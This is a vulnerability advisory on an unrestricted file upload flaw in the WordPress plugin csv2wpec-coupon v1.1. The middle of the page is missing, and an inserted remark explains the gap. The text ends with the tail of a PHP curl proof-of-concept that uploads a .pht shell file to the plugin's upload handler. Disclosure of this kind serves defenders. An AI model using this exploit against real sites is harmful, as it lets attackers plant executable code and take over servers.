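VDB-ID: 153
Title: Remote file upload vulnerability in wordpress plugin csv2wpec-coupon v1.1
Vulnerability Date: 2015-09-11
Download: https://wordpress.org/plugins/csv2wpec-coupon
Vendor: https://profiles.wordpress.org/esclarmonde/
Notified: 0000-00-00
Vendor Contact:

Description: Csv2WPeC Coupon provides an easy way to import and export WP e-Commerce Coupon items from and to a CSV file.

Vulnerability: The code in csv2wpecCoupon_FileUpload.php does not properly sanitize user input. It checks the uploaded file's MIME type for x-php, but this check can be bypassed when using the short code for [the rest of this sentence and the opening of the proof-of-concept script are missing from this copy of the page, probably stripped as markup during extraction]

The request fields in the proof-of-concept fragment below (UPLOAD_DIR, folder, name) show the destination directory and file name being supplied by the client, and the uploaded file uses a .pht extension, which some server configurations execute as PHP; a MIME-type check alone therefore does not prevent a script from being stored where it may run. The advisory records no vendor notification date and names no fixed version, so version 1.1 should be treated as affected.

"; $uploadfile="/var/www/s.pht"; $ch = curl_init("http://192.168.0.47/wp-content/plugins/csv2wpec-coupon/csv2wpecCoupon_FileUpload.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('UPLOAD_DIR'=>'/usr/share/wordpress/wp-content/uploads/','OP_TYPE'=>'shell','DATA_KEY'=>1,'shell_file'=>"@$uploadfile",'folder'=>'/usr/share/wordpress/wp-content/uploads/','name'=>'s.pht')); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?>

URL: http://www.vapidlabs.com/advisory.php?v=153
Credit: Larry W. Cashdollar, @_larry0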